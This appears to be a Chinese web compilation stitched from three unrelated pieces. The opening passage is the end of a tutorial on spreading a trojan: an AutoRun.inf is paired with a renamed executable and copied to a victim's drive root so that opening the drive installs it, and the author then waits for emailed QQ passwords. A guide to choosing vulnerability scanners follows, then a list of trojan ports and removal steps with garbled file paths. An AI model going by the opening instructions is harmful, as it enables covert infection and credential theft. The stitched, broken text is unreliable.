保存为AutoRun.inf,其中的winnt32.exe为木马文件。把AutoRun.inf和winnt32.exe一起拷到对方某分区的根目录下。这样,只要他雙击该分区就会中木马!这样可以大大的增加木马运行的主动性!须知许多人现在都非常警惕,不熟悉的檔他们輕易的不会运行,而这种方法就很难防範了。
以后,你就等者用郵箱收信收对方的QQ密码吧。
注意,本文只是技术交流,大家不要隨意盜取别人的QQ。同时为了保障安全我们没有完全刊登源代码。敬请原諒!
===================================
选择漏洞扫描工具
对于一个复杂的多層结構的系统和网路安全規劃来说,隱患扫描是一项重要的組成元素。隱患扫描能够类比骇客的行为,对系统設置进行攻击測试,以帮助管理员在骇客攻击之前,找出网路中存在的 漏洞。这样的工具可以远端評估你的网路的安全级别,并生成評估報告,提供相应的整改措施。
目前,市场上有很多隱患扫描工具,按照不同的技术(基于网路的、基于主机的、基于代理的、C/S的)、不同的特徵、不同的報告方法,以及不同的監听模式,可以分成好几类。不同的產品之间,漏洞檢測的準確性差别较大,这就决定了生成的報告的有效性上也有很大区别。
选择正確的隱患扫描工具,对于提高你的系统的安全性,非常重要。
1、漏洞扫描概述
在字典中,Vulnerability意思是漏洞或者缺乏足够的防护。在軍事术语中,这个詞的意思更为明確,也更为嚴重------有受攻击的嫌疑。
每个系统都有漏洞,不论你在系统安全性上投入多少財力,攻击者仍然可以发现一些可利用的特徵和配置缺陷。这对于安全管理员来说,实在是个不利的消息。但是,多数的攻击者,通常做的是簡單的事情。发现一个已知的漏洞,远比发现一个未知漏洞要容易的多,这就意味者:多数攻击者所利用的都是常見的漏洞,这些漏洞,均有书面资料记載。
⑤ 生成的報告的特性(内容是否全面、是否可配置、是否可定制、報告的格式、輸出方式等);
⑥ 对于漏洞修复行为的分析和建议(是否只報告存在哪些問題、是否会告訴您应该如何修補这些漏洞);
⑦ 安全性(由于有些扫描工具不僅僅只是发现漏洞,而且还进一步自动利用这些漏洞,扫描工具自身是否会帶来安全風險);
⑧ 性能;
⑨ 价格结構
这样的話,采用适当的工具,就能在骇客利用这些常見漏洞之前,查出网路的薄弱之处。如何快速簡便地发现这些漏洞,这个非常重要。
漏洞,大体上分为两大类:
① 软体编写错误造成的漏洞;
② 软体配置不当造成的漏洞。
漏洞扫描工具均能檢測以上两种类型的漏洞。漏洞扫描工具已经出现好多年了,安全管理员在使用这些工具的同时,骇客们也在利用这些工具来发现各种类型的系统和网路的漏洞。
入侵是重要的第一步。当您邁出了这一步后,接下来的是:如何选择满足您公司需要的合适的隱患扫描技术,这同样也很重要。以下列出了一系列衡量因素:
① 底層技术(比如,是被动扫描还是主动扫描,是基于主机扫描还是基于网路扫描);
② 特性;
③ 漏洞庫中的漏洞数量;
④ 易用性;
2.1 底層技术
比较漏洞扫描工具,第一是比较其底層技术。你需要的是主动扫描,还是被动扫描;是基于主机的扫描,还是基于网路的扫描,等等。一些扫描工具是基于Internet的,用来管理和集合的伺服器程式,是运行在软体供应商的伺服器上,而不是在客户自己的机器上。这种方式的優点在于檢測方式能够保证经常更新,缺点在于需要依賴软体供应商的伺服器来完成扫描工作。
扫描古城可以分为"被动"和"主动"两大类。被动扫描不会產生网路流量包,不会導致目标系统崩溃,被动扫描工具对正常的网路流量进行分析,可以設計成"永远线上"檢測的方式。與主动扫描工具相比,被动扫描工具的工作方式,與网路監控器或IDS类似。
主动扫描工具更多地帶有"入侵"的意圖,可能会影響网路和目标系统的正常操作。他们并不是持續不断运行的,通常是隔一段时间檢測一次。
基于主机的扫描工具需要在每台主机上安装代理(Agent)软体;而基于网路的扫描工具则不需要。基于网路的扫描工具因为要佔用较多资源,一般需要一台專门的电脑。
如果网路環境中含有多种作業系统,您还需要看看扫描其是否相容这些不同的作業系统(比如Microsoft、Unix以及Netware等)。
2.2 管理员所关心的一些特性
通常,漏洞扫描工具完成一下功能:扫描、生成報告、分析并提出建议,以及资料管理。在许多方面,扫描是最常見的功能,但是资讯管理和扫描结果分析的準確性同样很重要。另外要考慮的一个方面是通知方式:当发现漏洞后,扫描工具是否会向管理员報警?采用什么方式報警?
对于漏洞扫描软体来说,管理员通常关係以下几个方面:
① 報表性能好;
② 易安装,易使用;
③ 能够檢測出缺少哪些補丁;
④ 扫描性能好,具備快速修复漏洞的能力;
⑤ 对漏洞及漏洞等级檢測的可*性;
⑥ 可擴展性;
⑦ 易升级性;
⑧ 性价比好;
2.3 漏洞庫
只有漏洞庫中存在相关资讯,扫描工具才能檢測到漏洞,因此,漏洞庫的数量决定了扫描工具能够檢測的範圍。
然而,数量并不意味者一切,真正的檢验标準在于扫描工具能否檢測出最常見的漏洞?最根本的在于,扫描工具能否檢測出影響您的系统的那些漏洞?扫描工具中有用的總量取决于你的网路設備和系统的类型。你使用扫描工具的目的是利用它来檢測您的特定環境中的漏洞。如果你有很多Netware伺服器,那么,不含Netware漏洞庫的扫描工具就不是你的最佳选择。
当然,漏洞庫中的攻击特性必须经常升级,这样才能檢測到最近发现的安全漏洞。
2.4 易使用性
一个难以理解和使用的介面,会阻礙管理员使用这些工具,因此,介面友好性尤为重要。不同的扫描工具软体,介面也各式各样,从簡單的基于文本的,到复杂的圖形介面,以及Web介面。
2.5 扫描報告
对管理员来说,扫描報告的功能越来越重要,在一个面向文檔的商務環境中,你不但要能够完成你的工作,而且还需要提供书面资料说明你是怎样完成的。事实上,一个扫描可能会得到几百甚至几千个结果,但是这些资料是没用的,除非经过整理,轉换成可以为人们理解的资讯。这就意味者理想情況下,扫描工具应该能够对这些资料进行分类和交*引用,可以導到其他程式中,或者轉换成其他格式(比如CSV,HTML,XML,MHT,MDB,EXCEL以及Lotus等等),采用不同方式来展现它,并且能够很容易的與以前的扫描结果做比较。
漏洞,才完成一半工作。一个完整的方案,同时将告訴你針对这些漏洞将采取哪些措施。一个好的漏洞扫描工具会对扫描结果进行分析,并提供修复建议。一些扫描工具将这些修复建议整合在報告中,另外一些则提供產品网站或其他线上资源的鏈结。
漏洞修复工具,它可以和流行的扫描工具结合在一起使用,对扫描结果进行匯總,并自动完成修复过程。
2.7 分析的準確性
只有当報告的结果是精確的,提供的修复建议是有效的,一份包含了詳細漏洞修复建议的報告, 才算是一份優秀的報告。一个好的扫描工具必须具有很低的误報率(報告出的漏洞实际上不存在)和漏報率(漏洞存在,但是没有檢測到)。
2.8 安全問題
因扫描工具而造成的网路癱瘓所引起的经濟損失,和真实攻击造成的損失是一样的,都非常巨大。一些扫描工具在发现漏洞后,会尝试进一步利用这些漏洞,这样能够確保这些漏洞是真实存在的,进而消除误報的可能性。但是,这种方式容易出现难以預料的情況。在使用具備这种功能的扫描工具的时候,需要格外小心,最好不要将其設置成自动运行狀態。
扫描工具可能造成网路失效的另一种原因,是扫描过程中,超負荷的资料包流量造成拒絕服務(DOS,Denial OfService)。为了防止这一点,需要选择好适当的扫描設置。相关的設置项有:併发的线程数、资料包间隔时间、扫描物件總数等,这些项应该能够調整,以便使网路的影響降到最低。一些扫描工具还提供了"安全扫描"的範本,以防止造成对目标系统的損耗。
2.9 性能
扫描工具运行的时候,将佔用大量的网路帶寬,因此,扫描过程应尽快完成。当然,漏洞庫中的漏洞数越多,选择的扫描模式越复杂,扫描所耗时间就越长,因此,这只是个相对的数值。提高性能的一种方式,是在企業网中部署多个扫描工具,将扫描结果回饋到一个系统中,对扫描结果进行匯總。
3、隱患扫描工具的价格策略
商業化的扫描工具通常按以下几种方式来发佈器授权许可证:按IP地址授权,按伺服器授权,按管理员授权。不同的授权许可证方式有所区别。
3.1 按IP段授权
许多扫描其產品,比如eEye的Retina和ISS(InternetSecurity Scanner)要求企業用户按照IP段或IP範圍来收費。换句話说,价格取决于所授权的可扫描的IP位址的数目。
3.2 按伺服器授权
一些扫描工具供应商,按照每个伺服器/每个工作站来計算器许可证的价格。伺服器的授权价格会比工作站高很多,如果有多台伺服器的話,扫描工具的价格会明顯上升。
3.3 按管理员授权
对于大多数企業而言,这种授权方式,比较簡單,性价比也较好。
4、總结
在现在的互联网環境中,威脅无处不在。为了防範攻击,第一件事就是在骇客发动攻击之前,发现网路和系统中的漏洞,并及时修复。
但是,漏洞扫描工具在特性、精確性、价格以及可用性上差别较大,如何选择一个正確的隱患扫描工具,尤为重要。
=====================================================
骇客及木马攻击常見埠的关閉
以下列出的埠僅为相关木马程式默认情況下开放的埠,请根據具体情況采取相应的操作:
707埠的关閉:
这个埠开放表示你可能感染了nachi蠕蟲病毒,该蠕蟲的清除方法如下:
1、停止服務名为WinS Client和NetworkConnections Sharing的两项服務
2、刪除c:WinntSYSTEM32WinS目录下的DLLHOST.EXE和SVCHOST.EXE文件
3、编輯註冊表,刪除HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices项中名为RpcTftpd和RpcPatch的两个鍵值
1999埠的关閉:
这个埠是木马程式BackDoor的默认服務埠,该木马清除方法如下:
1、使用进程管理工具将notpa.exe进程结束
2、刪除c:Windows目录下的notpa.exe程式
3、编輯註冊表,刪除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Run项中包含c:Windowsotpa.exe /o=yes的鍵值
2001埠的关閉:
这个埠是木马程式黑洞2001的默认服務埠,该木马清除方法如下:
1、首先使用进程管理软体将进程Windows.exe殺掉
2、刪除c:Winntsystem32目录下的Windows.exe和S_Server.exe文件
3、编輯註冊表,刪除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion
RunServices项中名为Windows的鍵值
4、将HKEY_CLASSES_ROOT和HKEY_LOCAL_MACHINESoftwareCLASSES项中的Winvxd项刪除
5、修改HKEY_CLASSES_ROOTxtfileshellopencommand项中的
c:Winntsystem32S_SERVER.EXE%1为C:WinNTNOTEPAD.EXE %1
6、修改HKEY_LOCAL_MACHINESoftwareCLASSESxtfileshellopencommand
项中的c:Winntsystem32S_SERVER.EXE%1鍵值改为 C:WinNTNOTEPAD.EXE %1
2023埠的关閉:
这个埠是木马程式Ripper的默认服務埠,该木马清除方法如下:
1、使用进程管理工具结束sysrunt.exe进程
2、刪除c:Windows目录下的sysrunt.exe程式檔
3、编輯system.ini文件,将shell=explorer.exesysrunt.exe 改为shell=explorer.exe后保存
4、重新啟动系统
2583埠的关閉:
这个埠是木马程式Wincrash v2的默认服務埠,该木马清除方法如下:
1、编輯註冊表,刪除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Run项中的WinManager ="c:Windowsserver.exe"鍵值
2、编輯Win.ini文件,将run=c:Windowsserver.exe改为run=后保存退出
3、重新啟动系统后刪除C:WindowssystemSERVER.EXE
3389埠的关閉:
首先说明3389埠是Windows的远端管理终端所开的埠,它并不是一个木马程式,请先確定该服務是否是你自己开放的。如果不是必须的,请关閉该服務。
Win2000关閉的方法:
1、Win2000server 开始-->程式-->管理工具-->服務里找到TerminalServices服務项,选中屬性选项将啟动类型改成手动,并停止该服務。
2、Win2000pro开始-->設置-->控制面板-->管理工具-->服務里找到TerminalServices服務项,选中屬性选项将啟动类型改成手动,并停止该服務。
Winxp关閉的方法:
在我的电脑上点右鍵选屬性-->远端,将里面的远程协助和远端桌面两个选项框里的勾去掉。
4444埠的关閉:
如果发现你的机器开放这个埠,可能表示你感染了msblast蠕蟲,清除该蠕蟲的方法如下:
1、使用进程管理工具结束msblast.exe的进程
2、编輯註冊表,刪除HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
项中的"Windowsauto update"="msblast.exe"鍵值
3、刪除c:Winntsystem32目录下的msblast.exe文件
4899埠的关閉:
首先说明4899埠是一个远端控制软体(remoteadministrator)服務端監听的埠,他不能算是一个木马程式,但是具有远端控制功能,通常殺毒软体是无法查出它来的,请先確定该服務是否是你自己开放并且是必需的。如果不是请关閉它。
关閉4899埠:
1、请在开始-->运行中輸入cmd(98以下为command),然后 cdC:Winntsystem32(你的系统安装目录),輸入r_server.exe /stop后按回車。
然后在輸入r_server/uninstall /silence
2、到C:Winntsystem32(系统目录)下刪除r_server.exeadmdll.dll
raddrv.dll三个文件
5800,5900埠:
首先说明5800,5900埠是远端控制软体VNC的默认服務埠,但是VNC在修改过后会被用在某些蠕蟲中。
请先確认VNC是否是你自己开放并且是必须的,如果不是请关閉
关閉的方法:
1、首先使用fport命令確定出監听在5800和5900埠的程式所在位置(通常会是c:Winntfont***plorer.exe)
2、在任務管理器中殺掉相关的进程(注意有一个是系统本身正常的,请注意!如果错殺可以重新运行c:Winntexplorer.exe)
3、刪除C:Winntfonts中的explorer.exe程式。
4、刪除註冊表HKEY_LOCAL_MACHINESoftwareMicrosoftWindows
CurrentVersionRun项中的Explorer鍵值。
5、重新啟动机器。
6129埠的关閉:
首先说明6129埠是一个远端控制软体(dameware ntutilities)服務端監听得埠,他不是一个木马程式,但是具有远端控制功能,通常的殺毒软体是无法查出它来的。请先確定该服務是否是你自己安装并且是必需的,如果不是请关閉
关閉6129埠:
1、选择开始-->設置-->控制面板-->管理工具-->服務
找到DameWare MiniRemote Control项点击右鍵选择屬性选项,将啟动类型改成禁用后停止该服務。
2、到c:Winntsystem32(系统目录)下将DWRCS.EXE程式刪除。
3、到註冊表内将HKEY_LOCAL_MACHINESYSTEMControlSet001Services项中的DWRCS鍵值刪除
6267埠的关閉:
6267埠是木马程式廣外女生的默认服務埠,该木马刪除方法如下:
1、啟动到安全模式下,刪除c:Winntsystem32下的DIAGFG.EXE文件
2、到c:Winnt目录下找到regedit.exe文件,将该文件的尾码名改为.com
3、选择开始-->运行輸入regedit.com进入註冊表编輯页面
4、修改HKEY_CLASSES_ROOTexefileshellopencommand项的鍵值为
"%1" %*
5、刪除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices项中名字为Diagnostic Configuration的鍵值
6、将c:Winnt下的regedit.com改回到regedit.exe
6670、6771埠的关閉:
这些埠是木马程式DeepThroat v1.0- 3.1默认的服務埠,清除该木马的方法如下:
1、编輯註冊表,刪除HKEY_LOCAL_MACHINESOFTWAREMicroSoftWindowsCurrentVersion
Run项中的‘System32‘=c:Windowssystem32.exe鍵值(版本1.0)或‘SystemTray‘ = ‘Systray.exe‘ 鍵值(版本2.0-3.0)鍵值
3、重新啟动机器后刪除c:Windowssystem32.exe(版本1.0)或c:Windowssystemsystray.exe(版本2.0-3.0)
6939 埠的关閉:
这个埠是木马程式Indoctrination默认的服務埠,清除该木马的方法如下:
1、编輯註冊表,刪除
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionRun
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionRunServices
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionRunOnce
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionRunServicesOnce
四项中所有包含Msgsrv16="msgserv16.exe"的鍵值
2、重新啟动机器后刪除C:Windowssystem目录下的msgserv16.exe文件
6969埠的关閉:
这个埠是木马程式PRIORITY的默认服務埠,清除该木马的方法如下:
1、编輯註冊表,刪除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Run Services项中的"PServer"=C:WindowsSystemPServer.exe鍵值
2、重新啟动系统后刪除C:WindowsSystem目录下的PServer.exe文件
7306埠的关閉:
这个埠是木马程式网路精靈的默认服務埠,该木马刪除方法如下:
1、你可以使用fport察看7306埠由哪个程式監听,记下程式名稱和所在的路徑
2、如果程式名为Netspy.exe,你可以在命令行方式下到该程式所在目录輸入命令Netspy.exe/remove来刪除木马
3、如果是其他名字的程式,请先在进程中结束该程式的进程,然后到相应目录下刪除该程式。
4、编輯註冊表,将HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun项和HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices项中與该程式有关的鍵值刪除
7511埠的关閉:
7511是木马程式聰明基因的默认連接埠,该木马刪除方法如下:
1、首先使用进程管理工具殺掉MBBManager.exe这个进程
2、刪除c:Winnt(系统安装目录)中的MBBManager.exe和Explore32.exe程式檔,刪除c:Winntsystem32目录下的editor.exe文件
3、编輯註冊表,刪除註冊表HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Run项中内容为C:WinNTMBBManager.exe鍵名为MainBroadBackManager的项。
4、修改註冊表HKEY_CLASSES_ROOTxtfileshellopencommand中的c:Winntsystem32editor.exe%1改为c:WinntNOTEPAD.EXE %1
5、修改註冊表HKEY_LOCAL_MACHINESoftwareCLASSEShlpfileshellopencommand
项中的C:WinNTexplore32.exe%1鍵值改为C:WinNTWinHLP32.EXE %1
7626埠的关閉:
7626是木马冰河的默认开放埠(这个埠可以改变),木马刪除方法如下:
1、啟动机器到安全模式下,编輯註冊表,刪除HKEY_LOCAL_MACHINEsoftwaremicrosoftWindowsCurrentVersionRun
项中内容为c:Winntsystem32Kernel32.exe的鍵值
2、刪除HKEY_LOCAL_MACHINEsoftwaremicrosoftWindowsCurrentVersionRunservices项中内容为C:Windowssystem32Kernel32.exe的鍵值
3、修改HKEY_CLASSES_ROOTxtfileshellopencommand项下的C:Winntsystem32Sy***plr.exe%1为C:Winnt otepad.exe %1
4、到C:Windowssystem32下刪除檔Kernel32.exe和Sy***plr.exe
8011埠的关閉:
8011埠是木马程式WAY2.4的默认服務埠,该木马刪除方法如下:
1、首先使用进程管理工具殺掉msgsvc.exe的进程
2、到C:Windowssystem目录下刪除msgsvc.exe文件
3、编輯註冊表,刪除HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Run项中内容为C:WinDOWSSYSTEMmsgsvc.exe的鍵值
